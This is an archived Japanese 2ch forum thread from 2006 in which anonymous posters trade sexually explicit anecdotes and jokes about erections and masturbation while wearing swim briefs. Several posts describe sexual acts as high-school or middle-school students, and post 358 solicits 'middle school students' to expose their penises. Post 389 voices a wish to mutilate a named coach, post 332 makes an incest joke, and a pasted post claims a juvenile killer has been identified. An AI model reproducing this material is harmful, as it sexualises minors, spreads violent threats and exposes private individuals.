おばちゃんがいる

270 :第1のコース!名無しくん:2006/07/28(金) 13:32:41 ID:N8yOsgv4
男女兼用サウナのときやばい。変なこと考え勃起

271 :第1のコース!名無しくん:2006/07/29(土) 01:27:39 ID:HgUAXKpb
そろそろチンチンマッサージして寝ますね。

272 :トクメイ:2006/08/01(火) 04:02:17 ID:LHIZa30K
コノスレ、アクセスシタダケデ、ウイルスニカンセンスルンダネ
ウイルスノナマエ(VBS/Linong@MM)
コノウイルスノショウサイジョウホウhttp://www.mcafee.com/japan/security/virL2001.asp?v=VBS/Linong@MM


273 :第1のコース!名無しくん:2006/08/01(火) 04:58:04 ID:IZfQPZw0
確かに競泳水着だと目立ちますが、勃起したことに気付いても恥ずかしいとは思いません。
誰にでもあることだから仕方ないと思っています。
他人が勃起しているのを見てもみんな見て見ぬふりです。

274 :第1のコース!名無しくん:2006/08/01(火) 08:00:22 ID:dP/1NnyE
締め付けがきついからちょっと立つのは無理ですね。
立ったらかなり苦しそうだ。


275 :名無しさん:2006/08/01(火) 08:15:24 ID:ekIl/NHB
たちかけたら、トイレはに駆け込み、暫く、おさまるまで、待つ。

276 :第1のコース!名無しくん:2006/08/01(火) 14:18:41 ID:eWhB+W+o
確かに、上向きの人間が勃起したら、かなり卑猥だな。
競泳水着フェ地のビデオ見て思った。
俺は、立っても下向きだから、そんなでもないが。

277 :第1のコース!名無しくん:2006/08/01(火) 15:03:43 ID:Gl7zhdQf
元競泳選手の男の子にいろいろ教えてもらうのですが
なんかいつもあやしいのです。
胸元みてたり、なかなかプールからでなかったり
出たと思ったら瞬時にトイレへ行ったり・・・。
一緒にジャグジーとか入る時は平気みたいなんだけど
私が特にセクシーな体ではないので不思議です。
いい子だから大好きなんだけどね。

278 :第1のコース!名無しくん:2006/08/01(火) 16:38:46 ID:tZsXLJIb
腹筋で足もっらったりしてるとやばい。

279 :第1のコース!名無しくん:2006/08/01(火) 16:39:38 ID:LHIZa30K
?

280 :第1のコース!名無しくん:2006/08/01(火) 16:57:13 ID:Y3ahdl1t
腹筋している時に足に乗られながら腹筋すりと
やばいって事じゃない?向き合うからw

281 :第1のコース!名無しくん:2006/08/01(火) 23:17:35 ID:xWl04+Pa
高校時代に向かい合いの開脚してた。
足を開いてお互いの足の裏をあわせ、手を握り合ってそのまま
胸と胸がぶつかるまで引き寄せあう。

たまに女子の相手をしたが、これは完全フル勃起。

282 :第1のコース!名無しくん:2006/08/02(水) 09:15:17 ID:T+fiXq0g
>>281
それってけっこう有名な陸トレメニューなのか。
激エロだよな。。。 手を握るところで既にハアハアなのに、
目の前にハイレグの股間&胸だもんな。レッドゾーン勃起だった。

283 :第1のコース!名無しくん:2006/08/02(水) 12:39:05 ID:pjMuJDIS
倒立で足持ってもらったりしても視線を感じる

284 :第1のコース!名無しくん:2006/08/03(木) 11:10:16 ID:TaZd8sNs
>>281
お、それやったことないけど水泳部の奴がやっているのを見たことがある。
互いに相手の尻をつかんでぐっと押し合っていたぞ。檄エロだな。

285 :第1のコース!名無しくん:2006/08/05(土) 01:34:26 ID:XiZ84E8f
>>281
俺もそれやった!
うちの水泳部の指定水着はマーキュラインの黄緑で、
しかも2サイズ小さいのがノーマルだったから
乳首ポッチは当たり前でたまにハイレグの股間から毛がはみ出てたり
男子の競パンも同じ色で2サイズ小さいモッコリ&半ケツだったから
もう大ピンチだった。
水に入る前でまだ競パンが乾いてる常態でこのトレーニングがあったときに
1回ギンギンになるだけで済まず我慢汁がしみてウロコの潜像が浮き出てきたことがあって
相手の女子に「おもらししてる〜」てからかわれた時は恥ずかしくて死にそうだったorz

286 :第1のコース!名無しくん:2006/08/05(土) 12:16:42 ID:Zv8ypNLe
全く同じ内容のDVD持ってるよ。
台詞もおなし

287 :第1のコース!名無しくん:2006/08/05(土) 14:39:34 ID:bdEg/ahb
>>286
ようつべにうpしる

288 :第1のコース!名無しくん:2006/08/05(土) 16:55:48 ID:OV2qmgA4
>>285-286
つーことは、285はそれを自分の体験の如く語ったわけかww

289 :第1のコース!名無しくん:2006/08/05(土) 17:39:56 ID:oRGWNVzv
少しゆるめの水着着た女の子見てたら少しずつま〇こ見えてその後トイレでオナニーした

290 :第1のコース!名無しくん:2006/08/09(水) 07:57:09 ID:BMPVsiiJ
カウパー結構でちゃうからなー

291 :第1のコース!名無しくん:2006/08/09(水) 11:40:03 ID:YGeHJfBd
高校2年のとき、ラグビー部に入ってるかっこいいクラスメートがいて俺のズリネタだった。
水泳の授業で初めてそいつの競パン姿見たとき、激しく勃起してしまい恥ずかしかった。
しかし、それ以上にそいつのきんたまが大きかったので、勃起がおさまってから、
病気?って訊いてみたら、もともとそういう大きさということだった。
別の日にふざけるフリをして、競パンの上からもっこりに軽くタッチしたら
向こうもふざけておれのちんこをひとこすりしてきた。
そのときには、そいつがそういうことを嫌悪しない奴だとわかってたので、
さらに仕返しのつもりで強くタッチした。
そのときには俺はすでにギンギンになってしまったが、快感からやめられず、
その仕返しで股間を撫でられたとき、「うわ勃起してる〜」と言われた。
さらに俺がお返しで股間を手のひらでこすると、相手も勃起してたw
そんな経緯で、トイレの個室に入ってチンコをこすり合い、
二人とも射精した。
そんな関係は卒業まで続いた。
俺はほもだが、相手は彼女がいたのでバイ。バイの方が羨ましいなー。

292 :第1のコース!名無しくん:2006/08/09(水) 19:22:19 ID:3IO98Rcu
マンずり乙

293 :第1のコース!名無しくん:2006/08/14(月) 13:21:50 ID:6aqrUXbR
マン刷りでブス眼鏡ちゃん

294 :第1のコース!名無しくん:2006/08/14(月) 21:18:24 ID:/Yjjs0Lw
肉棒

295 :第1のコース!名無しくん:2006/08/14(月) 21:28:28 ID:g/tXUdGb


身体検査と偽り男子児童のペニスのサイズを測定した女性教諭を書類送検
http://news18.2ch.net/test/read.cgi/editorial/1155320660/

296 :第1のコース!名無しくん:2006/08/16(水) 14:36:39 ID:kv/VEeL0
フルボッキはやばすぎ!

297 :第1のコース!名無しくん:2006/08/18(金) 12:21:04 ID:W0SO5OS+
プールの中で抜く。

298 :第1のコース!名無しくん:2006/08/23(水) 19:31:50 ID:YEFXN6lm
俺が行ってる屋外プールにちょうどこんな感じの水着の監視員がいる

ttp://016.gamushara.net/mizugi/data/life.jpg

誰か勃起しないで済む方法教えて〜


299 :第1のコース!名無しくん:2006/08/25(金) 07:56:12 ID:qHQkMyf1
履くときから勃起

300 :第1のコース!名無しくん:2006/08/25(金) 08:58:20 ID:VZ6J7ChA
2次元の子しか愛せない俺。だけど水着の女の子みると勃起が止まらん。性欲処理には最高だ。ハアハアハアハア

301 :第1のコース!名無しくん:2006/08/25(金) 12:42:05 ID:qHQkMyf1
時には手すりにこすりつけてることも

302 :第1のコース!名無しくん:2006/09/01(金) 16:26:46 ID:j4lbRQdR
小さい穴に突っ込んでいる

303 :第1のコース!名無しくん:2006/09/05(火) 14:39:32 ID:q9V+SK6i
水泳部の時練習前に友達にふざけて電気アンマを5分くらいされたら勃起上にはみ出てしまってかなり恥ずかしかった。

304 :第1のコース!名無しくん:2006/09/07(木) 18:21:22 ID:Hw0RydAv
泳いでる間に抜くときも

305 :第1のコース!名無しくん:2006/09/07(木) 20:57:38 ID:BfKK/4A4
痛くて抜けないよ(T_T)

306 :第1のコース!名無しくん:2006/09/08(金) 12:27:17 ID:mO7+3buN
背泳ぎでやるのはまずい

307 :第1のコース!名無しくん:2006/09/08(金) 14:08:55 ID:E4TAFNzZ
よけいに目立つじゃん!

308 :第1のコース!名無しくん:2006/09/11(月) 00:58:13 ID:HiTrijph
選手のはなかったけど今年からイントラだけど先輩や会員さんが準備体操している時に勃起してしまうようになった。

309 :第1のコース!名無しくん:2006/09/12(火) 14:26:44 ID:3YaCXOUk
小さすぎる競パン穿いてるんだから勃起すれば「はみ出る」のが当たり前。
気にして隠すのは返っていやらしいと思う。


310 :第1のコース!名無しくん:2006/09/12(火) 16:19:10 ID:3eiJDyvZ
309さんは女姓の前でも隠さないで堂々としてるの?かっこいいですね。つか変態?

311 :第1のコース!名無しくん:2006/09/12(火) 19:57:13 ID:E+rd8dcq
そんなもんあたりまえ。でも思い出してオナるけど。

312 :第1のコース!名無しくん:2006/09/13(水) 12:23:00 ID:TeulC4xR
ゴーグル洗うふりして、ゴーグルでしこる

313 :第1のコース!名無しくん:2006/09/14(木) 01:13:46 ID:2xLVk10b
この前市民プール行ったとき、かわいい女の子をみて勃起してしまい、しこっちゃいました!!

314 :第1のコース!名無しくん:2006/09/14(木) 08:04:41 ID:FpIigW/v
横からどりだしてやるときは結構きつい

315 :フィンガール:2006/09/14(木) 20:02:13 ID:qbosVqxI
男子って最悪・・(**)穴があったら何でもいいの〜!?変態っっ!!オ〇ニーすりゃ済む話でしょ〜!!ちなみに個人的に私はしたくなったらスル女だよ。(必ず家に帰ってから。)だって動物の本能だから、マッチョな男子スイマー見たら、女でもソノ気になる事あるもん。

316 :フィンガール:2006/09/14(木) 20:34:27 ID:qbosVqxI
ちなみに私は結婚してるから、想像だけにとどめておくのが自分の美学。男子の勃起なんて当たり前の事だからあまり気にしないし。本能的に反応してしまった時には、家に帰って抜くよ。

317 :第1のコース!名無しくん:2006/09/15(金) 01:07:40 ID:0cE09Gz/
勃起したらオナニーしかない!!

318 :第1のコース!名無しくん:2006/09/15(金) 05:22:40 ID:AcMDPjL4
おちんちんを切除するに決まっている。

319 :第1のコース!名無しくん:2006/09/15(金) 07:56:36 ID:NLNwBEIh
ビート板をこすりすけて

320 :フィンガール:2006/09/15(金) 16:47:21 ID:BQgfRIZX
聞いた事があるのですが、試合一週間前から、禁欲すると、ベストが出やすいというのは本当ですか?(女子も、もちろんだけど、特に男子に効果があると聞きました・・理由は、男子の場合、射精と共に、体内のエネルギーが放出されてしまうらしいです。)

321 :第1のコース!名無しくん:2006/09/15(金) 18:56:05 ID:gevuc5A6
それは本当だけど一週間も我慢してためたら練習の時も試合の時も勃起しまくりだよ。

322 :フィンガール:2006/09/15(金) 21:12:33 ID:BQgfRIZX
やっぱり本当なんだね。でも、確かにそれは困るよねぇ。男子もいろいろと大変だね。それだけパワーがあるということなのかもね!!

323 :第1のコース!名無しくん:2006/09/15(金) 21:17:42 ID:nWZKwGwM
ネ釜が要る

324 :第1のコース!名無しくん:2006/09/15(金) 21:28:35 ID:gevuc5A6
フィンガールさんは競パンからタマやちんこはみ出してる男の前にいたらどうしますか?

325 :フィンガール:2006/09/16(土) 23:37:28 ID:ZmUZd5mR
(毎度失礼します・・)ぶっちゃけ、立っている状態の人はたまに見かけるけれども、(見て見ぬふり。)はみ出してる人にはちょっと引きつつ、さりげなく指摘するかも・・。(変態みたいな人は怖いから無視(><))ていうか、それ、完璧に変態だよ!!

326 :第1のコース!名無しくん:2006/09/17(日) 17:50:52 ID:1l/Mi3cP
俺はちゃんと穿いてますよ。はみ出てないし。

327 :第1のコース!名無しくん:2006/09/18(月) 05:35:24 ID:ieJXx+PU
たまに練習用の、重ね着出来るボックスタイプの水着をはけば、かなり勃起対策になると思う。(練習にもなるし)

328 :フィンガール:2006/09/18(月) 06:03:57 ID:ieJXx+PU
それ言えるかも、ですね。私も〇ピードか〇リーナの女子用が欲しい。(ア〇ックスのちょっと・・分厚すぎ。見た感じ、拷問だと思う・・。)

329 :第1のコース!名無しくん:2006/09/19(火) 12:32:32 ID:EzDGZ2W7
そんなんだとさおや玉はみ出るって

330 :フィン%:2006/09/19(火) 18:36:48 ID:sWPE63fp
そうなのかなぁ?けっこう大きくなるんだね。普段ダンナのを見てるからあんまり気にならないけど・・。

331 :第1のコース!名無しくん:2006/09/19(火) 22:03:40 ID:tE60N9x7
>>330
ダンナがお前のマンコ見て勃起したチンコかよ

332 :第1のコース!名無しくん:2006/09/19(火) 22:05:55 ID:m7dL4W5J
今日、泳いでる時はどうって事なかったのに
シャワー浴びてる時ぐんぐん立ち始めて、下腹を叩き出した。

コレも、妹がフェらしてくれないからだ!

333 :フィンガール:2006/09/19(火) 23:03:19 ID:sWPE63fp
なんか、私を淫乱だとかキモイっていう項目が出来たみたいで・・。なので今後はスレを自粛させて頂きます。楽しかった〜!!勃起は男のシンボルだぁ(笑)なんて。

334 :第1のコース!名無しくん:2006/09/20(水) 01:29:56 ID:331fayUb
男子は試合前に射精するとダメだけど女子は逆にнするといいって話し聞いた。

335 :第1のコース!名無しくん:2006/09/20(水) 12:36:49 ID:8kCDrhKn
ペットボトルの飲料を飲むふりをして、鞄にしのばせていた
オナホールで速攻ぬく

336 :第1のコース!名無しくん:2006/09/20(水) 13:00:42 ID:d4UA8/Gk
>>334
ヒントを得た気がした。

337 :第1のコース!名無しくん:2006/09/22(金) 07:58:24 ID:9iLx76BY
シャワー室で抜く

338 :第1のコース!名無しくん:2006/09/22(金) 09:58:49 ID:uwN4SykN
シャワー室で抜くって競パン穿いたまま?

339 :第1のコース!名無しくん:2006/09/24(日) 02:14:31 ID:VgENrvE4
少し前、スクールのコーチが、白の競パンをはいていて、思いっきり勃起していた。かなり目のやり場に困った。しかし彼は白の競パンが似合う実力&ボディの持ち主なので、勃起さえもカッコ良く見えてしまうのは何故だろう?

340 :第1のコース!名無しくん:2006/09/24(日) 14:22:34 ID:U8jbxLhs
>>339
釣りでなければ詳細キボン

341 :第1のコース!名無しくん:2006/09/25(月) 01:13:37 ID:/EBo/pd2
白の競パンや水着は(透けて写る)赤外線の特殊カメラに透けにくい、という事を聞いた事がある。しかし、勃起したチ〇ポがかなりはっきりと見えたので、困惑した。ボディー同様、立派な一物だった。


342 :第1のコース!名無しくん:2006/09/25(月) 01:17:33 ID:/EBo/pd2
しかし、彼には白い競パンをはき続けてほしいと願う。(私は女だが、決して、チ〇ポを見たいが為ではない。)

343 :第1のコース!名無しくん:2006/09/25(月) 01:22:20 ID:vTm1qwpL
カッコー人は、何でも似合います。勃起してても、みんな受け入れてしまいます。

逆に、ブサイクは何を履いても、どんなブランド品でもダメなのさ。W

344 :第1のコース!名無しくん:2006/09/25(月) 12:55:01 ID:rCnQINM2
勃起しないように事前に抜くが、勃起してしまうという

345 :第1のコース!名無しくん:2006/09/25(月) 14:57:00 ID:9tBZJ98L
しばらく静止


346 :第1のコース!名無しくん:2006/09/25(月) 18:25:40 ID:/EBo/pd2
男子の勃起は生理現象だから、仕方ないと思う。でも個人的に好みのタイプの男子スイマーが勃起しているのを目撃した時は、女子も非常に困惑するのは事実。

347 :第1のコース!名無しくん:2006/09/25(月) 18:33:38 ID:/EBo/pd2
白競パン事件の時、自分は(本人を尊敬しているが、決して色恋沙汰の感情を持っているわけではない。)なぜか無意識に自分の乳首が立ってしまい、焦った。この先、練習が更にハードになったらどうやって集中しようかと悩んでいる。

348 :第1のコース!名無しくん:2006/09/25(月) 19:19:49 ID:O6h13tMt
てかその人は勃っても水着からはみ出ないのか?

349 :第1のコース!名無しくん:2006/09/25(月) 21:42:54 ID:EfOhz6OR
確かスパッツだったので、くっきりと形は丸見えだった。確かに立派なモノだったが、水着からはみ出してはいなかった。未だに、何に対して勃起していたのか謎に思う。

350 :第1のコース!名無しくん:2006/09/26(火) 00:45:47 ID:Q7mFH0nA
日中でも眠くなると無意味にボキーするよね

351 :第1のコース!名無しくん:2006/09/26(火) 12:34:11 ID:ZRNUlrxy
コースロープをまたいでこする

352 :第1のコース!名無しくん:2006/09/26(火) 16:23:40 ID:voyDl4z/
ではそのコースロープ上に持ち上げよう。

353 :第1のコース!名無しくん:2006/09/26(火) 18:02:11 ID:Mo28dPMs
>344=練習前に(いわば)抜いたら、体力的にきつくないですか(??)

354 :第1のコース!名無しくん:2006/09/26(火) 21:12:45 ID:nFBrUhLZ
ホントにきつい練習ならば勃起はすぐなえる
それぐらい練習はつらい

355 :第1のコース!名無しくん:2006/09/27(水) 12:56:45 ID:NhvajKK3
ブラシで掃除しているふりをして棒にこすりつける

356 :第1のコース!名無しくん:2006/09/27(水) 15:03:05 ID:W/l4znaF
突然だけど「シンクロにシティ」てヤンジャンで連載したてた漫画知ってる?主人公が競パン穿いて勃起してたし競パン穿いたまま射精したシーンもあったよ。

357 :第1のコース!名無しくん:2006/09/27(水) 22:03:22 ID:WnGIuaGM
いわば(ぶっちゃけ)童貞の男子などは、そうなりやすいのかなぁ?(カワイイ)

358 :第1のコース!名無しくん:2006/09/27(水) 22:23:58 ID:IKn0uMLR
>>313
勃起したチンポが見たい中学生諸君
まずお前のチンポ先見せろ

359 :第1のコース!名無しくん:2006/09/28(木) 00:34:09 ID:KdQBFguB
筋トレで縮むのと同じ原理じゃね
筋肉に血液いく
てことは勃起時に殴られるとダメージアップ??ww

360 :第1のコース!名無しくん:2006/09/28(木) 01:32:00 ID:9E4xxSfL
>>357
フィンガールか?

361 :第1のコース!名無しくん:2006/09/28(木) 08:21:22 ID:V+KeCQ4m
床のタイルに押しつけてうつ伏せオナニー

362 :第1のコース!名無しくん:2006/09/28(木) 08:22:22 ID:EtSusU17
>違うよ。(私はシモネタ話は好きだけど、別に男に飢えてる訳ではないし。)

363 :第1のコース!名無しくん:2006/09/28(木) 08:34:23 ID:EtSusU17
勃起は見た目、面白い。なぜあんなになるのだろう(何の為かは知ってはいるが・・)疑問だ。

364 :第1のコース!名無しくん:2006/09/28(木) 12:26:42 ID:V+KeCQ4m
最悪ドアに挟んで抜く

365 :第1のコース!名無しくん:2006/09/29(金) 12:03:38 ID:+HDoc61v
つぶ状の消毒剤に突っ込む

366 :第1のコース!名無しくん:2006/09/29(金) 13:07:55 ID:z9kakVq8
加害少年は弁護士に。
遺族は家庭崩壊に。

「30年前の「酒鬼薔薇」事件」とも呼ばれるサレジオ高校殺人事件について語るスレッド。

【参考文献】
奥野修司『心にナイフをしのばせて』文芸春秋社
■内容紹介■
高1の少年が同級生の首を切り落とした驚愕の事件。被害者の母はさながら
廃人のように生き、犯人は弁護士として社会復帰していた!
1969年春、横浜の高校で悲惨な事件が起きた。入学して間もない男子生徒が、
同級生に首を切り落とされ、殺害されたのだ。「28年前の酒鬼薔薇事件」である。

10 年に及ぶ取材の結果、著者は驚くべき事実を発掘する。殺された少年の母は、
事件から1年半をほとんど布団の中で過ごし、事件を含めたすべての記憶を失って
いた。そして犯人はいま、大きな事務所を経営する弁護士になっていたのである。
これまでの少年犯罪ルポに一線を画する、新大宅賞作家の衝撃ノンフィクション。(MK)
http://www.bunshun.co.jp/book_db/html/3/68/36/4163683607.shtml

【事件番号】横浜家決昭和44年9月3日 昭44(少)2461号
家庭裁判所月報22巻7号78頁(判決全文は>>2-20くらい)

【FAQ】
Q:殺人者でも弁護士になれるんですか。
A:加害少年は「禁錮以上の刑に処せられたもの」(現行弁護士法7条1号)にあたらないのでなれます。
Q:加害少年は特定されたんですか。
A:既に前スレでかなりの確度を持って特定されています。

【前スレ】少年Aは弁護士に、遺族は家庭崩壊4 【少年法】
http://tmp6.2ch.net/test/read.cgi/youth/1159092212/l50




367 :第1のコース!名無しくん:2006/09/29(金) 21:34:40 ID:BM8DMykN
ボッキー君。

368 :第1のコース!名無しくん:2006/09/29(金) 22:28:14 ID:H5uKXuzg
誰か仮アド載せてー競パン画像交換しない?

369 :第1のコース!名無しくん:2006/09/29(金) 22:30:23 ID:3jnbA2A/
俺ので良ければ

370 :第1のコース!名無しくん:2006/09/29(金) 22:31:40 ID:Oy1mG6GY
勃起した中村マイ

371 :第1のコース!名無しくん:2006/09/29(金) 22:33:52 ID:H5uKXuzg
載せて

372 :第1のコース!名無しくん:2006/09/29(金) 22:36:12 ID:aP6qjnIZ
ttp://aquarhythm.kir.jp/img/aq2/aq2sam500.wmv

373 :第1のコース!名無しくん:2006/09/29(金) 22:39:12 ID:H5uKXuzg
あれまだかなぁ

374 :第1のコース!名無しくん:2006/09/29(金) 22:43:06 ID:x3rwWNEQ
>>372ってなに?

375 :第1のコース!名無しくん:2006/09/30(土) 21:38:30 ID:MxflHQiD
>>374
男が女用の競泳水着を着て泳いでいる 変態ビデオ

376 :第1のコース!名無しくん:2006/10/01(日) 16:25:35 ID:+uRFO6gq
あげておくか

377 :第1のコース!名無しくん:2006/10/02(月) 03:52:23 ID:2jDzqNTb
インストラクターしてる人に聴きたいけど生徒の前で勃起したらどうするの?

378 :第1のコース!名無しくん:2006/10/02(月) 12:43:54 ID:W0njYAzy
金網にピストン!

379 :第1のコース!名無しくん:2006/10/02(月) 19:45:34 ID:zDG2FfTN
コンニャクを持参して、抜く。

380 :第1のコース!名無しくん:2006/10/02(月) 23:43:31 ID:zafeSEA2
>>377
まじめに仕事していりゃ勃起しねーよ 20代の主婦が透け赤着ていても勃起しねーよ
ばっかじゃないの?

381 :第1のコース!名無しくん:2006/10/03(火) 00:11:55 ID:EBumHcxs
俺はするよ。その時はあわててシャツを着て隠すしかない。

382 :第1のコース!名無しくん:2006/10/03(火) 22:45:20 ID:/lrMnVhk
イントラの7割は芸

383 :第1のコース!名無しくん:2006/10/04(水) 00:16:00 ID:SYr7gt42
何でイントラは芸なんですか?

384 :第1のコース!名無しくん:2006/10/04(水) 08:17:53 ID:UZ2JFC5m
給料が安いからだよ。(!?)

385 :第1のコース!名無しくん:2006/10/04(水) 17:00:46 ID:XeUqwmS1
飛び込み台にもたれかかってやる

386 :第1のコース!名無しくん:2006/10/06(金) 12:43:51 ID:oZt3Fv29
倉庫のロープをまきつけて

387 :第1のコース!名無しくん:2006/10/07(土) 11:41:49 ID:88ShshcE
(前のもう一つの分野の所属チームの女ヘッドコーチ)の股の間には、チンポが生えていた。
たまに勃起して、妙な感じだった。ムカツク「要領かまし、ちゃっかりチンポ男女」だった為
もらう物だけもらい、さっさとチームをやめてやった。(いわば男勝りタイプだった。)

388 :第1のコース!名無しくん:2006/10/07(土) 11:43:56 ID:88ShshcE
その指導の影響か、最近、自分もチンポが生えてきたらしく、たまに勃起するようになった(笑)

389 :第1のコース!名無しくん:2006/10/07(土) 11:58:57 ID:88ShshcE
(さっきの男女はF尾という名前である。)しかも、M井というオカマ男コーチもおり、なかなかのイケメン(美人)だが
競技時代のトラウマからか、常日頃、ブツブツと物をつぶやいていた。(そこが何とも気持ち悪い。仕事が嫌ならさっさ
と辞めろ。)見た目、好みのタイプだが、理不尽なことがあり、障害者である私は、指導員である彼に無視、ハミゴにされ
心に大変深い傷を負った。(傷の話しはウソプ〜(‘‘)0後は事実。)もみ消そうといっても、そうは問屋がおろさない。
世の中、そんなに甘くはない。(お互い様である。)彼のチンポをハサミでちょん切ってニ度とセックスができない様にして
やりたい。(もう一人の彼女のクリも同様。)



390 :第1のコース!名無しくん:2006/10/07(土) 12:07:17 ID:88ShshcE
この場を借りて。小さい頃から運動オンチで、やる事が遅くて、トロい自分を強く(大きくして)
下さり、ありがとうございました(^^)v自分はどうしても周りと群れる事(組織)がどうも苦手で
周りの空気を読めない(読むことを否定している?かも?)性格です。今後とも頑張ります!!(自分は
言うまでもなく、ただの「石ころ」ですから・・。それじゃ、ダメなんですよね。では。)

391 :第1のコース!名無しくん:2006/10/07(土) 12:08:54 ID:88ShshcE
プルブイにはさんで抜く。

392 :第1のコース!名無しくん:2006/10/07(土) 12:17:19 ID:88ShshcE
シー・ユー・ネクスト・タイム!!セイ・グッド・バイ・トゥ・ユー!!(ディアー・ミス・F&ミスターM(‘‘)v))
「キープ・クール・イン・ザ・ウォーター!!」リスペクト!!<BYーベリーベリースローレディー>


393 :第1のコース!名無しくん:2006/10/07(土) 12:24:28 ID:88ShshcE
ペットボトルに入れて抜く。そのスペ〇マをプロテインとしてリサイクルし、飲む。


394 :第1のコース!名無しくん:2006/10/07(土) 13:26:56 ID:HnEL1cI8
ペットボトルにはちんこが入りません。

395 :第1のコース!名無しくん:2006/10/07(土) 15:55:21 ID:88ShshcE
>394=アンタのなら入る。きっと入るはず。(努力しよう。)

396 :第1のコース!名無しくん:2006/10/09(月) 21:15:05 ID:xhQA67Hw
いい事を思いついた。大サイズの人は無理せずにホット用ペットボトル、小サイズの人は
無理せずに、普通のペットボトルを使用したらいいと思う。(中の人はどうすればいいの
だろう?)


397 :第1のコース!名無しくん:2006/10/09(月) 23:18:21 ID:BCU0N7mi
今、中サイズの人の対策を思いついた。ゲー〇レー〇のペットボトルが良いサイズなのではと
思われる。(競パンのお友に。)

398 :第1のコース!名無しくん:2006/10/10(火) 02:39:19 ID:gOq+QYy9
サイズ的にはヤクルトの空き容器で十分

399 :第1のコース!名無しくん:2006/10/10(火) 12:59:17 ID:KKq1d/F2
そのまま競パン脱いで、キャップを勃起した竿にかけて物干しのまねを
する

400 :第1のコース!名無しくん:2006/10/11(水) 16:42:20 ID:NPSI24d5
太めのホースにおチ〇ポを入れて、そのまま立ちションをする。

401 :第1のコース!名無しくん:2006/10/11(水) 16:53:29 ID:rpxub42q
パイプにつっこんで

402 :第1のコース!名無しくん:2006/10/12(木) 15:30:13 ID:19bIDY2C
ロッカーのドアに挟んでピストン

403 :第1のコース!名無しくん:2006/10/16(月) 12:40:00 ID:5lnFRKEj
本でしごく

404 :第1のコース!名無しくん:2006/10/17(火) 07:23:22 ID:ilbNyyt2
>>399
それコンパの持ちネタにしてる奴がいるよ(笑

405 :第1のコース!名無しくん:2006/10/17(火) 11:15:11 ID:zeT+xJF5
勃起させて「勃起」という持ちネタもいいかも

406 :第1のコース!名無しくん:2006/10/18(水) 20:55:06 ID:a8ooqsUr
あの質問なんですが、隣に好きな人がいるだけで勃起することってあるんですか?
そしたらその処理ってどうするんですか?

407 :第1のコース!名無しくん:2006/10/19(木) 12:46:01 ID:esiVxOy0
あるね、本当はちょっと手とか借りたいのですが、飛び込み台の陰に
隠れて抜いたり、ビート板にこすりつけたりして抜く

408 :第1のコース!名無しくん:2006/10/19(木) 18:58:25 ID:jalCGo3f
>>406
こんなとこで真面目に質問しているの? それとも釣り?
普通 >>407 みたいなことはありえないよ

409 :第1のコース!名無しくん:2006/10/20(金) 02:09:14 ID:7s5I9txm
それは仕方がないと思う。人間の本能だからどうしようもない。隠さずに堂々とすべきだ。

410 :第1のコース!名無しくん:2006/10/20(金) 03:55:35 ID:WTK5d4t8
インポで悩むより、堂々勃起が健康的。

411 :第1のコース!名無しくん:2006/10/20(金) 13:14:25 ID:vczQRbaj
手も借りたくないの?ネコの手も

412 :第1のコース!名無しくん:2006/10/20(金) 20:20:39 ID:8VegUmwu
>>409
人間に限らず動物でも同じじゃなかったか?

413 :第1のコース!名無しくん:2006/10/20(金) 20:41:15 ID:upic94qd
紐はしっかり縛ってぜったいtimpoが外に飛び出ないようにするべし

414 :第1のコース!名無しくん:2006/10/25(水) 12:48:00 ID:MAaYAYRX
横からでもハミでてしまう

415 :第1のコース!名無しくん:2006/10/25(水) 18:29:21 ID:WSdERH/j
そんなに巨大な一物なのか???

416 :第1のコース!名無しくん:2006/10/30(月) 12:36:12 ID:mDsIwBaB
民族なみだなー

417 :第1のコース!名無しくん:2006/11/08(水) 23:38:55 ID:I+2iRERX
競パン穿いてる時じゃないけど。

中学の時かなぁ?
研修旅行があって、夜大浴場に入るんだけど、湯船の中で勃起したことはあったな。
出るに出れなくて、でもノボせてきて、よけいにおさまらなくて。

タオルでうまいこと隠して出ましたよ、立ったまま。

418 :第1のコース!名無しくん:2006/11/25(土) 17:03:15 ID:YDLiN7rj
スポーツショップで競パン選んでる時に勃起して店員に股間を見られた時は恥ずかしかった


419 :第1のコース!名無しくん:2006/11/25(土) 17:32:36 ID:HSfmHTUC
インストラクターしてるけどいつもチンコ触られたり携帯のエロサイト見せられたりして勃起させられる。競パン穿いてるのは俺だけでしかも極ミニ。

420 :第1のコース!名無しくん:2006/12/03(日) 01:54:36 ID:fOI4T16s
ホモの煽りは性質が悪い

421 :第1のコース!名無しくん:2006/12/07(木) 01:56:49 ID:nD0eEsgU
荷造り用のヒモを使ってモッコリをアップさせる方法を思いついた♪


422 :第1のコース!名無しくん:2006/12/07(木) 12:37:02 ID:eNWJeaL0
写生する。

423 :第1のコース!名無しくん:2007/01/07(日) 13:46:48 ID:4hXcvKcb
420はバカか?遊ばれてるだけだろ。

424 :第1のコース!名無しくん:2007/01/18(木) 12:58:01 ID:j61fYRIn
切断する

88 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)